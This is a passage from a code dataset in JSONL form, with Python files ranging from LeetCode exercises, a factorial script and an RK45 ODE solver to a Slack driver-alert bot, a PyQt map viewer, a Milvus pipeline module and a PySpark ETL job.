i+1)\r\n path.pop()\r\n nums = sorted(nums)\r\n dfs(nums,0)\r\n return res\r\n# @lc code=end\r\n\r\n","sub_path":"leetcode/90.子集-ii.py","file_name":"90.子集-ii.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"129897258","text":"n = int(input('Escolha um número e veja seu fatorial: '))\n\nc = n # c vai ser o numero escolhido em n\nf = 1 # f vai ser o ultimo numero do fatorial ,ou seja, 1\n\nwhile c > 0: # enquanto o c for maior que 0\n print('{}'.format(c), end='') #vai mostrar o numero escolhido em n\n print(' x ' if c > 1 else ' = ', end='') # colocar o simbolo de 'x' e '=' conforme a regra\n c -= 1 # subtrair do c -1 e atribuir esse valor a c\n f *= c #pegar o f multiplicar por c atribuir esse valor a f\nprint('{}'.format(f)) #printar o f","sub_path":"ProjetosPython/PraticandoPython/P49-Fatorial.py","file_name":"P49-Fatorial.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"102153605","text":"filepath = 'winner.in'\n\nwith open(filepath) as fp:\n n = int(fp.readline())\n line = fp.readline()[0:n*2]\n one = line.count('1')\n two = line.count('2')\n \n if one > two:\n print('Mike')\n elif one < two:\n print('Jack')\n else:\n print('Tie')\n","sub_path":"B/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"224878089","text":"# -*- coding: utf-8 -*-\nfrom openprocurement.api.utils import (\n get_file,\n update_file_content_type,\n json_view,\n context_unpack,\n APIResource,\n)\nfrom openregistry.lots.core.utils import (\n save_lot, oplotsresource, apply_patch,\n)\nfrom openregistry.lots.loki.validation import validate_publication_data\n\n@oplotsresource(name='loki:Lot Publications',\n collection_path='/lots/{lot_id}/publications',\n path='/lots/{lot_id}/publications/{publication_id}',\n lotType='loki',\n description=\"Lot related publications\")\nclass LotPublicationsResource(APIResource):\n\n @json_view(permission='view_lot')\n def collection_get(self):\n \"\"\"Lot Publications List\"\"\"\n if self.request.params.get('all', ''):\n collection_data = [i.serialize(\"view\") for i in self.context.publications]\n else:\n collection_data = sorted(dict([\n (i.id, i.serialize(\"view\"))\n for i in self.context.publications\n ]).values(), key=lambda i: i['dateModified'])\n return {'data': collection_data}\n\n @json_view(content_type=\"application/json\", permission='upload_lot_publications', validators=(validate_publication_data, ))\n def collection_post(self):\n \"\"\"Lot Publications Upload\"\"\"\n publication = self.request.validated['publication']\n self.context.publications.append(publication)\n if save_lot(self.request):\n self.LOGGER.info('Created lot publication {}'.format(publication.id),\n extra=context_unpack(self.request, {'MESSAGE_ID': 'lot_publication_create'}, {'puublication_id': publication.id}))\n self.request.response.status = 201\n publication_route = self.request.matched_route.name.replace(\"collection_\", \"\")\n self.request.response.headers['Location'] = self.request.current_route_url(_route_name=publication_route, publication_id=publication.id, _query={})\n return {'data': publication.serialize(\"view\")}\n\n @json_view(permission='view_lot')\n def get(self):\n \"\"\"Lot Publication Read\"\"\"\n publication = self.request.validated['publication']\n publication_data = publication.serialize(\"view\")\n return {'data': publication_data}\n\n @json_view(content_type=\"application/json\", permission='upload_lot_publications', validators=(validate_publication_data, ))\n def patch(self):\n \"\"\"Lot Publications Update\"\"\"\n if apply_patch(self.request, src=self.request.context.serialize()):\n update_file_content_type(self.request)\n self.LOGGER.info('Updated lot publication {}'.format(self.request.context.id),\n extra=context_unpack(self.request, {'MESSAGE_ID': 'lot_publication_patch'}))\n return {'data': self.request.context.serialize(\"view\")}\n","sub_path":"openregistry/lots/loki/views/lot_publication.py","file_name":"lot_publication.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"43641232","text":"import os\nimport requests\nfrom slackclient import SlackClient\nfrom pyquery import PyQuery\nimport datetime\n\n# starterbot's ID as an environment variable\nBOT_ID = os.environ.get(\"BOT_ID\")\n\n# instantiate Slack & Twilio clients\nslack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))\n\ndef check_drivers():\n pre_url = 'http://www.guru3d.com/'\n url = 'http://www.guru3d.com/files-categories/videocards-nvidia-geforce-vista-%7C-7.html'\n headers = {'user-agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0\"}\n forum_page = requests.get(url, headers=headers).content\n pq = PyQuery(forum_page)\n first_post_title = pq(\"h1\")[0]\n driver_version = first_post_title.text_content().split('driver')[0].strip()\n print(\"driver version: %s\" % driver_version)\n date = pq(\".newsstoryheader\")[0].text_content().split('on:')[1].split('[')[0].strip()\n print(date)\n formatted_date = datetime.datetime.strptime(date, \"%m/%d/%Y %I:%M %p\")\n date_difference = datetime.datetime.now() - formatted_date\n seconds_difference = date_difference.seconds + date_difference.days * 86400\n if (seconds_difference <= 1800):\n print('New driver! Out %d minutes ago!' % (seconds_difference/60))\n page_url = pre_url + first_post_title.getnext().getnext().find('a').get('href')\n response = \":nvidia: @ryuken NEW DRIVER !! *%s* ! %s :nvidia:\" % (driver_version, page_url)\n slack_client.api_call(\"chat.postMessage\", channel=\"general\", text=response, as_user=True)\n else:\n print('Existing driver. Out %d minutes ago!' % (seconds_difference/60))\n\nif __name__ == \"__main__\":\n if slack_client.rtm_connect():\n print(\"NvidiaBot connected and running!\")\n check_drivers()\n else:\n print(\"Connection failed. Invalid Slack token or bot ID?\")\n","sub_path":"check_new_drivers.py","file_name":"check_new_drivers.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"326350970","text":"class Solution:\n def distributeCandies(self, candies: int, num_people: int) -> List[int]:\n n = [0 for i in range(num_people)]\n index = 0\n while candies>0:\n n[index%num_people]+= min(candies,index+1)\n candies-=index+1\n index+=1\n return n\n \n \n","sub_path":"Day17 Distribute Candies to People.py","file_name":"Day17 Distribute Candies to People.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"267396767","text":"import numpy as np\nimport scipy as sc\nimport matplotlib.pyplot as plt\nimport math\n\nT = 50\t\t\t# Maximale Zeit\nh0 = 0.01\t\t# Start-Schrittweite\nsteps = 900000\t\t# Anzahl maximaler Schritte (so gross waehlen, dass genug Platz fuer Werte vorhanden ist)\nvar_count = 2\t\t# Anzahl der dynamischen Variablen\neps_tol = 1.e-10\t# Epsilon-Toleranz\nb_fak = 0.9\t\t# Sicherheitsfaktor\n\n# Startwerte der dynamischen Variablen\ndyn_var_start = [5000, 120]\n\n# Arrays fuer Werte der dynamischen Variablen\ndyn_var = np.zeros((var_count, steps))\nt_array = np.zeros(steps)\n\n# Startwerte einsetzen\nfor i in range(0, var_count):\n\tdyn_var[i][0] = dyn_var_start[i]\nt_array[0] = 0\n\n# Butcher-Parameter (Fehlberg)\nalpha = np.array([0, 1/4, 3/8, 12/13, 1, 1/2])\nbeta = np.array([[0, 0, 0, 0, 0, 0],\n\t[1/4, 0, 0, 0, 0, 0],\n\t[3/32, 9/32, 0, 0, 0, 0],\n\t[1932/2197, -7200/2197, 7296/2197, 0, 0, 0],\n\t[439/216, -8, 3680/513, -845/4104, 0, 0],\n\t[-8/27, 2, -3544/2565, 1859/4104, -11/40, 0]])\nc = np.array([25/216, 0, 1408/2565, 2197/4104, -1/5, 0])\nc_star = np.array([16/135, 0, 6656/12825, 28561/56430, -9/50, 2/55])\n# ..............................\n\n# k-Vektoren\nk_vec = np.zeros((var_count, 6))\n\n# Epsilon-Hilfswerte\neps_vec = np.zeros(var_count)\neps_min = 0\neps_max = 0\n\n# Vektor der h-Werte\nh_vec = np.zeros(steps)\nh_vec[0] = h0\n\n# EpsSum zum Abschaetzen des Fehlers\neps_sum = np.zeros(steps)\neps_sum[0] = 0\n\n# Funktionen f. t skalar; x vektoriell\ndef dyn_var_func1(t, x):\n\treturn 2*x[0]-0.02*x[0]*x[1]\ndef dyn_var_func2(t, x):\n\treturn 0.0002*x[0]*x[1]-0.8*x[1]\n# Array obiger Funktionen\ndyn_var_funcs = [dyn_var_func1, dyn_var_func2] #[dyn_var_func1, dyn_var_func2, ..., ]\n\n# k-Vektor-Array berechnen (DAS IST EINE \"var_count X 6\"-Matrix\ndef k_calc(element):\n\tfor i1 in range(0, var_count): #k-Vektor fuer jede dynamische Variable\n\t\tfor i2 in range(0, 6): #6 Elemente des k-Vektors berechnen\n\t\t\tbutch_fak = np.dot(beta[i2,:],k_vec[i1,:]) # k-Summe berechnen\n\t\t\tk_vec[i1][i2] = dyn_var_funcs[i1](t_array[element-1]+h_vec[element-1]*alpha[i2],\n\t\t\t\tdyn_var[:,element-1]+np.inner(h_vec[element-1] * butch_fak, np.ones(var_count)))\n\t# Jetzt sind alle k-Matrix eintraege berechnet -> nun: Schrittweite testen\n\thnew_calc(element)\n\n# Schrittweite testen und einstellen\ndef hnew_calc(element):\n\tfor i1 in range(0, var_count):\n\t\teps_temp = np.dot((c - c_star), k_vec[i1,:])\n\t\teps_vec[i1] = math.fabs(eps_temp) #Array aller eps-Werte\n\n\teps_max = np.amax(eps_vec)\n\tif eps_max >= eps_tol: #Falls eps zu gross\n\t\th_vec[element-1] *= b_fak*(eps_tol/eps_max)**0.2\n\t\tk_calc(element) # Dies ist eine Rekursion!\n\telse: # Schrittweite zulaessig - danach neue Schrittweite\n\t\teps_min = 0\t\t\n\t\tfor k in range(0, var_count): # groesstes eps, welches kleiner als eps_tol ist nehmen\n\t\t\tif (eps_vec[k] <= eps_tol) and (eps_vec[k] >= eps_min):\n\t\t\t\teps_min = eps_vec[k]\n\t\tcalc_next_step(element, eps_min) #naechsten Schritt berechnen\n\t\th_vec[element] = h_vec[element-1] * b_fak * (eps_tol/eps_min)**0.25\n\n# Neue Elemente berechnen\ndef calc_next_step(element, epsmin):\t\n\tfor i1 in range(0, var_count):\n\t\tdyn_var[i1][element] = dyn_var[i1][element-1] + h_vec[element-1] * np.dot(c_star, k_vec[i1,:])\n\t\tt_array[element] = t_array[element-1] + h_vec[element-1]\n\t\teps_sum[element] = eps_sum[element-1] + epsmin\n\n\n# !!! START !!!\ncounter = 0\nwhile (t_array[counter-1] <= T):\n\tcounter += 1\n\tk_calc(counter)\n# !!!!!!!!!!!!!\n\n\n# Bei dyn_var-arrays Nullen entfernen\ndyn_var_trimmed = np.zeros((var_count, counter))\nfor i in range(0, var_count):\n\tfor j in range(0, counter):\n\t\tdyn_var_trimmed[i][j] = dyn_var[i][j]\n\n# Bei t-array Nullen entfernen\nt_array_trimmed = np.zeros(counter)\nfor i in range(0, counter):\n\tt_array_trimmed[i] = t_array[i]\n\t\n# Bei eps_sum Nullen entfernen\neps_sum_trimmed = np.zeros(counter)\nfor i in range(0, counter):\n\teps_sum_trimmed[i] = eps_sum[i]\n\n\n# PLOTS\nfig, axes = plt.subplots(1,2)\n(ax1, ax2) = axes\n\nax1.set_title('x0 = 5000 / y0 = 120')\nax1.set_xlabel('Zeit t')\nax1.set_ylabel('Population x(t) / y(t)')\nax1.plot(t_array_trimmed, dyn_var_trimmed[0], 'bo')\nax1.plot(t_array_trimmed, dyn_var_trimmed[0]+eps_sum_trimmed, 'r-') #+fehler\nax1.plot(t_array_trimmed, dyn_var_trimmed[0]-eps_sum_trimmed, 'y-') #-fehler\nax1.plot(t_array_trimmed, dyn_var_trimmed[1], 'ro')\nax1.legend([\"x(t)\", \"x+Fehler\", \"x-Fehler\", \"y(t)\"])\n\nax2.set_title('')\nax2.set_xlabel('Population x(t)')\nax2.set_ylabel('Population y(t)')\nax2.plot(dyn_var_trimmed[0], dyn_var_trimmed[1], 'b-')\nax2.legend([\"y(x)\"])\nplt.show()\n","sub_path":"ODEs/RK45_Fehlberg.py","file_name":"RK45_Fehlberg.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"144150866","text":"import os\nimport sys\n\nimport requests\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QLabel\nfrom PyQt5.QtCore import Qt\n\nSCREEN_SIZE = [600, 450]\n\n\nclass Example(QMainWindow):\n def __init__(self):\n super().__init__()\n # self.ll = \"37.530887,55.703118\"\n self.ll = \"85.0,85.0\"\n # self.spn = \"0.002,0.002\"\n self.spn = \"85.0,85.0\"\n self.l = \"map\"\n self.initUI()\n self.update_image()\n\n def update_image(self):\n self.loading.show()\n self.getImage()\n self.pixmap = QPixmap(self.map_file)\n self.image.setPixmap(self.pixmap)\n self.loading.hide()\n\n def keyPressEvent(self, event):\n max_spn = 85.0\n min_spn = 0.001\n delta_move_up_down = 85 / 180\n delta_move_left_right = 1\n if event.key() == Qt.Key_PageUp:\n delta = 0.5\n data = list(map(float, self.spn.split(',')))\n data[0] *= (1 + delta)\n data[1] *= (1 + delta)\n if data[0] > max_spn:\n data[0] = max_spn\n if data[1] > max_spn:\n data[1] = max_spn\n self.spn = ','.join(list(map(str, data)))\n elif event.key() == Qt.Key_PageDown:\n delta = 0.5\n data = list(map(float, self.spn.split(',')))\n data[0] *= (1 - delta)\n data[1] *= (1 - delta)\n if data[0] < min_spn:\n data[0] = min_spn\n if data[1] < min_spn:\n data[1] = min_spn\n self.spn = ','.join(list(map(str, data)))\n elif event.key() == Qt.Key_Up:\n data = list(map(float, self.ll.split(',')))\n spn = list(map(float, self.spn.split(',')))\n data[1] += spn[1] * delta_move_up_down\n if data[1] > 85:\n data[1] = 85\n self.ll = ','.join(list(map(str, data)))\n elif event.key() == Qt.Key_Down:\n data = list(map(float, self.ll.split(',')))\n spn = list(map(float, self.spn.split(',')))\n data[1] -= spn[1] * delta_move_up_down\n if data[1] < -85:\n data[1] = -85\n self.ll = ','.join(list(map(str, data)))\n elif event.key() == Qt.Key_Left:\n data = list(map(float, self.ll.split(',')))\n spn = list(map(float, self.spn.split(',')))\n data[0] -= spn[0] * delta_move_left_right\n if data[0] < -179:\n data[0] += 360\n self.ll = ','.join(list(map(str, data)))\n elif event.key() == Qt.Key_Right:\n data = list(map(float, self.ll.split(',')))\n spn = list(map(float, self.spn.split(',')))\n data[0] += spn[0] * delta_move_left_right\n if data[0] > 179:\n data[0] -= 360\n self.ll = ','.join(list(map(str, data)))\n else:\n return\n\n self.update_image()\n print(f'spn={self.spn}, ll={self.ll}')\n def getImage(self):\n map_api_server = \"http://static-maps.yandex.ru/1.x/\"\n map_params = {\n \"ll\": self.ll,\n \"spn\": self.spn,\n \"l\": self.l\n }\n response = requests.get(map_api_server, params=map_params)\n\n if not response:\n print(\"Ошибка выполнения запроса:\")\n print(f\"{map_api_server}?{'&'.join([f'{key}={val}' for key, val in map_params.items()])}\")\n print(\"Http статус:\", response.status_code, \"(\", response.reason, \")\")\n sys.exit(1)\n\n # Запишем полученное изображение в файл.\n self.map_file = \"map.png\"\n with open(self.map_file, \"wb\") as file:\n file.write(response.content)\n\n def initUI(self):\n self.setGeometry(100, 100, *SCREEN_SIZE)\n self.setWindowTitle('Отображение карты')\n\n # Изображение\n self.image = QLabel(self)\n self.image.move(0, 0)\n self.image.resize(600, 450)\n\n # Надпись загрузки\n self.loading = LoadingText()\n\n def closeEvent(self, event):\n \"\"\"При закрытии формы подчищаем за собой\"\"\"\n os.remove(self.map_file)\n\n\nclass LoadingText(QWidget):\n def __init__(self):\n super().__init__()\n self.initUi()\n\n def initUi(self):\n self.setWindowTitle(\"Обновление...\")\n self.setFixedSize(300, 1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n ex.show()\n sys.exit(app.exec())\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"645641103","text":"# Copyright (C) 2019-2020 Zilliz. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing permissions and limitations under the License.\n\n\nimport logging\nimport json\nfrom typing import List\nfrom models.pipeline import Pipeline as DB\nfrom models.pipeline import insert_pipeline\nfrom models.pipeline import search_pipeline\nfrom models.pipeline import del_pipeline\nfrom common.error import PipelineCheckError\nfrom common.error import PipelineIlegalError\nfrom common.error import RPCExecError\nfrom common.error import NotExistError\nfrom common.const import OPERATOR_TYPE_ENCODER\nfrom common.const import OPERATOR_TYPE_PROCESSOR\nfrom operators.operator import all_operators\nfrom operators.operator import operator_detail\nfrom operators.client import execute, identity\nfrom storage.storage import MilvusIns\n\nlogger = logging.getLogger(__name__)\n\n\nclass Pipeline():\n def __init__(self, name, input, output, description,\n processors, encoder):\n self._pipeline_name = name\n self._input = input\n self._output = output\n self._pipeline_description = description\n self._processors = processors\n self._encoder = encoder\n self._description = description\n\n @property\n def name(self):\n return self._pipeline_name\n\n @property\n def description(self):\n return self._pipeline_description\n\n @property\n def input(self):\n return self._input\n\n @property\n def output(self):\n return self.output\n\n @property\n def processors(self):\n return self._processors\n\n @processors.setter\n def processors(self, processors):\n self._processors = processors\n\n @property\n def encoder(self):\n return self._encoder\n\n @encoder.setter\n def encoder(self, encoder):\n self._encoder = encoder\n\n def save(self):\n p = DB(name=self._pipeline_name, input=self._input,\n output=self._output, processors=json.dumps(self.processors),\n encoder=json.dumps(self.encoder), description=self._description)\n try:\n insert_pipeline(p)\n except Exception as e:\n raise e\n return self\n\n\ndef all_pipelines():\n res = []\n try:\n pipelines = search_pipeline()\n for p in pipelines:\n pipe = Pipeline(name=p.Pipeline.name, input=p.Pipeline.input,\n output=p.Pipeline.output,\n description=p.Pipeline.description,\n processors=json.loads(p.Pipeline.processors),\n encoder=json.loads(p.Pipeline.encoder))\n res.append(pipe)\n return res\n except Exception as e:\n logger.error(e)\n raise e\n\n\ndef pipeline_detail(name):\n try:\n p = search_pipeline(name)\n if not p:\n raise NotExistError(\"pipeline %s is not exist\" % name, \"\")\n pipe = Pipeline(name=p.name, input=p.input,\n output=p.output,\n description=p.description,\n processors=json.loads(p.processors),\n encoder=json.loads(p.encoder))\n return pipe\n except Exception as e:\n raise e\n\n\ndef create_pipeline(name, processors, encoder, description=None):\n try:\n # add encoder args check\n # create pipeline\n pipe = Pipeline(name=name, processors=processors, encoder=encoder,\n description=description, input=\"\", output=\"\")\n if pipeline_illegal(pipe):\n return PipelineIlegalError(\"Pipeline illegal check error\", \"\")\n return pipe.save()\n except Exception as e:\n logger.error(e)\n raise e\n\n\ndef delete_pipeline(name):\n try:\n p = del_pipeline(name)\n if not p:\n raise NotExistError(\"pipeline %s is not exist\" % name, \"\")\n p = p[0]\n pipe = Pipeline(name=p.name, input=p.input,\n output=p.output,\n description=p.description,\n processors=json.loads(p.processors),\n encoder=json.loads(p.encoder))\n return pipe\n except Exception as e:\n logger.error(e)\n raise e\n\n\ndef run_pipeline(p, **kwargs):\n todo_list = []\n if not isinstance(p, Pipeline):\n raise PipelineCheckError(\"check pipeline with error\", \"%s is not a Pipeline\" % p)\n for processor in p.processors:\n if not processor:\n continue\n op = operator_detail(processor[\"name\"])\n ins = op.inspect_instance(processor[\"instance\"])\n todo_list.append(ins)\n op = operator_detail(p.encoder[\"name\"])\n ins = op.inspect_instance(p.encoder[\"instance\"])\n todo_list.append(ins)\n\n def runner(todo_list):\n metadata, vectors = [], []\n urls = [kwargs['url']] if kwargs['url'] else []\n datas = [kwargs['data']] if kwargs['data'] else []\n try:\n for num, i in enumerate(todo_list):\n if num == len(todo_list) - 1:\n vectors, _ = execute(i, urls=urls, datas=datas)\n return vectors\n _, metadatas = execute(i, urls=urls, datas=datas)\n urls = [x.url for x in metadatas]\n datas = [x.data for x in metadatas]\n return metadata\n except Exception as e:\n raise RPCExecError(\"Execute with error\", e)\n\n try:\n return runner(todo_list)\n except Exception as e:\n logger.error(e)\n raise e\n\n\ndef test_pipeline(name, data=None, url=None):\n try:\n pipe = search_pipeline(name)\n p = Pipeline(name=pipe.name, input=pipe.input, output=pipe.output,\n description=pipe.description, processors=json.loads(pipe.processors),\n encoder=json.loads(pipe.encoder))\n return {\"result\": run_pipeline(p, data=data, url=url)}\n except Exception as e:\n raise e\n\n\ndef pipeline_illegal(pipe):\n # TODO Rewrite\n # encoder_name = encoder.get(\"name\")\n # encoder_instance_name = encoder.get(\"instance\")\n # # check operator and instance exist\n # encoder = operator_detail(encoder_name)\n # # get port and addr from runtime client\n # encoder_instance = encoder.inspect_instance(encoder_instance_name)\n # encoder_identity = identity(encoder_instance.endpoint)\n return False\n","sub_path":"search/pipeline/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"243819951","text":"import argparse\nimport logging\nlogging.basicConfig(format='%(asctime)s - %(levelname)-8s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\nfrom pyspark.sql.functions import col, coalesce, from_json, to_json, sort_array, \\\n udf, explode, to_date, row_number, lit, concat_ws, \\\n date_sub, when, lag, current_timestamp, concat, date_add\nfrom pyspark.sql.types import StructType, BooleanType, StringType, TimestampType, \\\n StructField, ArrayType, DateType, IntegerType\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.window import Window\nimport sys\nsys.path.append('/opt/bone/analytics/python-lib')\nfrom hashpipe import inject\nrelationship_ranking = ArrayType(StructType([\n StructField('relationship', StringType()),\n StructField('rank', IntegerType())\n]))\n\nsourcesys_ranking = ArrayType(StructType([\n StructField('sourceSystem', StringType()),\n StructField('rank', IntegerType())\n]))\n\nranking_fields = StructType([\n StructField('relationshipRanking', relationship_ranking),\n StructField('eligibilitySourceSys', sourcesys_ranking)\n])\n\nutility_fields = ArrayType(StructType([\n StructField('field', StringType()),\n StructField('name', StringType()),\n StructField('eligibilitySource', StringType()),\n StructField('facetsFieldName', StringType())\n]))\n\ncapabilities = ArrayType(StructType([\n StructField('name', StringType()),\n StructField('startDate', TimestampType()),\n StructField('endDate', TimestampType())\n]))\n\nattributes = ArrayType(StructType([\n StructField('name', StringType()),\n StructField('values', ArrayType(StringType())),\n StructField('allowNull', BooleanType()),\n StructField('excludeValue', BooleanType()),\n StructField('regex', BooleanType())\n]))\n\nsegmentations = ArrayType(StructType([\n StructField('name', StringType()),\n StructField('description', StringType()),\n StructField('default', BooleanType()),\n StructField('attributes', attributes),\n StructField('capabilities', capabilities),\n StructField('purchaserName', StringType()),\n StructField('purchaserCode', StringType())\n]))\n\nconfiguration_details = StructType([\n StructField('utilityFields', utility_fields),\n StructField('rankingFields', ranking_fields),\n StructField('segmentations', segmentations),\n StructField('startDate', TimestampType()),\n StructField('endDate', TimestampType())\n])\n\npolicy_details = ArrayType(StructType([\n StructField('number', StringType()),\n StructField('sourceCode', StringType()),\n StructField('default', StringType())\n]))\n\ncustomer_details = ArrayType(StructType([\n StructField('purchaserName', StringType()),\n StructField('purchaserCode', StringType()),\n StructField('clientLegalName', StringType()),\n StructField('policyDetails', policy_details),\n StructField('activeDate', TimestampType()),\n StructField('terminationDate', TimestampType())\n]))\n\ngroup_config = StructType([\n StructField('rallyClientName', StringType()),\n StructField('customerDetails', customer_details),\n StructField('configurationDetails', configuration_details),\n StructField('capabilities', capabilities),\n StructField('transformations', ArrayType(StringType()))\n])\n\nconfigurations = StructType([\n StructField('groupConfig', group_config),\n StructField('terminationDate', TimestampType()),\n StructField('created', TimestampType()),\n StructField('modified', TimestampType())\n])\n\ndef dreamliner_raw(mongo_path='/integration/data/etl/user_testing/mongo_extracts/dreamliner/group_segmentations'):\n spark = (\n SparkSession\n .builder\n .appName('dreamliner ETL')\n .config(\"spark.dynamicAllocation.enabled\", \"false\")\n .config(\"spark.sql.parquet.compression.codec\", \"snappy\")\n .enableHiveSupport()\n .getOrCreate()\n )\n\n df = spark.read.json(mongo_path)\n group_config_df = (\n df\n .outerExplode('configurations', 'config')\n .select(\n '_id',\n 'rallyClientName',\n 'rallyOwned',\n 'created',\n 'modified',\n from_json(to_json(col('config')), configurations).alias('c')\n )\n .select(\n col('_id.oid').alias('configuration_id'),\n col('rallyClientName').alias('rally_client_name'),\n col('rallyOwned').cast(StringType()).alias('rally_owned'),\n col('created').alias('doc_created'),\n col('modified').alias('doc_modified'),\n col('c.groupConfig').alias('gc'),\n col('c.terminationDate').alias('config_termination_date'),\n col('c.created').alias('config_created_date'),\n col('c.modified').alias('config_modified_date')\n )\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'doc_created',\n 'doc_modified',\n 'config_termination_date',\n 'config_created_date',\n 'config_modified_date',\n to_date(coalesce('config_modified_date', 'config_created_date')).alias('start_date'),\n col('gc.rallyClientName').alias('gc_rally_client_name'),\n col('gc.customerDetails').alias('customer_details'),\n col('gc.configurationDetails').alias('configuration_details'),\n col('gc.configurationDetails.startDate').alias('configuration_start_ts'),\n col('gc.configurationDetails.endDate').alias('configuration_end_ts'),\n col('gc.capabilities').alias('gc_capabilities'),\n col('gc.transformations').alias('gc_transformations')\n )\n )\n\n gc_ranking_df = (\n group_config_df\n .outerExplode('configuration_details.rankingFields.relationshipRanking','rExp')\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'configuration_start_ts',\n 'configuration_end_ts',\n col('config_termination_date').alias('configuration_termination_ts'),\n lit('relationship').alias('ranking_type'),\n coalesce(col('rExp.relationship'), lit('')).alias('ranking_field_name'),\n coalesce(col('rExp.rank'), lit('')).alias('rank'),\n 'start_date',\n lit('optum').alias('partner'),\n concat_ws(',', 'start_date').alias('compare_key')\n )\n .unionAll(\n group_config_df\n .outerExplode('configuration_details.rankingFields.eligibilitySourceSys','eExp')\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'configuration_start_ts',\n 'configuration_end_ts',\n col('config_termination_date').alias('configuration_termination_ts'),\n lit('source_system').alias('ranking_type'),\n coalesce(col('eExp.sourceSystem'), lit('')).alias('ranking_field_name'),\n coalesce(col('eExp.rank'), lit('')).alias('rank'),\n 'start_date',\n lit('optum').alias('partner'),\n concat_ws(',', 'start_date').alias('compare_key')\n )\n )\n )\n gc_ranking_df.printSchema()\n gc_ranking_df.show(100, False)\n\n spark.sql(\"DROP TABLE IF EXISTS edw_staging.stg_dim_dreamliner_group_ranking\")\n logger.info(\"Writing data to stg_dim_dreamliner_group_ranking table\")\n (\n gc_ranking_df\n .write\n .format('orc')\n .mode('overwrite')\n .option(\"compression\", \"snappy\")\n .saveAsTable(\"{}.stg_dim_dreamliner_group_ranking\".format('edw_staging'))\n )\n\n base_ranking = spark.read.table('{}.dim_dreamliner_group_ranking'.format('edw'))\n window = Window.partitionBy('rally_client_name', 'configuration_start_ts', 'configuration_end_ts', 'ranking_type', 'ranking_field_name').orderBy('start_date')\n window_desc = Window.partitionBy('rally_client_name', 'configuration_start_ts', 'configuration_end_ts', 'ranking_type', 'ranking_field_name').orderBy(col('start_date').desc())\n lit_end_date = lit('2999-12-31').cast(DateType())\n\n base_ranking_stg_unioun = (\n base_ranking\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'configuration_start_ts',\n 'configuration_end_ts',\n 'configuration_termination_ts',\n 'ranking_type',\n 'ranking_field_name',\n 'rank',\n 'start_date',\n 'partner',\n concat_ws(',', 'start_date').alias('compare_key')\n )\n .unionAll(gc_ranking_df)\n .withColumn('lag_compare_key', lag(col('compare_key')).over(window))\n )\n base_ranking_stg_unioun.show(10, False)\n\n dim_dreamliner_ranking = (\n base_ranking_stg_unioun\n .select(\n 'configuration_id',\n 'rally_client_name',\n 'rally_owned',\n 'configuration_start_ts',\n 'configuration_end_ts',\n 'configuration_termination_ts',\n 'ranking_type',\n 'ranking_field_name',\n 'rank',\n 'partner',\n when(col('compare_key') == col('lag_compare_key'),\n lit(None)).otherwise(col('start_date')).alias('start_date')\n )\n .filter(col('start_date').isNotNull())\n .withColumn('end_date', coalesce(date_sub(lag('start_date').over(window_desc), 1), lit_end_date))\n .withColumn('warehouse_update_user', lit('airflow'))\n .withColumn('warehouse_update_ts', current_timestamp())\n )\n\n dim_dreamliner_ranking.show(100, False)\n (\n dim_dreamliner_ranking\n .write\n .format('orc')\n .mode('overwrite')\n .option(\"compression\", \"snappy\")\n .saveAsTable(\"{}.dim_dreamliner_group_ranking_new\".format('edw'))\n )\n spark.sql(\"ALTER TABLE {}.dim_dreamliner_group_ranking RENAME TO {}.dim_dreamliner_group_ranking_old\".format('edw', 'edw'))\n spark.sql(\"ALTER TABLE {}.dim_dreamliner_group_ranking_new RENAME TO {}.dim_dreamliner_group_ranking\".format('edw', 'edw'))\n spark.sql(\"DROP TABLE IF EXISTS {}.dim_dreamliner_group_ranking_old\".format('edw'))\n\ndreamliner_raw('/integration/data/etl/user_testing/mongo_extracts/dreamliner/group_segmentations')\n","sub_path":"backup_0824/backup/old/ranking.py","file_name":"ranking.py","file_ext":"py","file_size_in_byte":10402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"371447156","text":"# Copyright 2013 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# 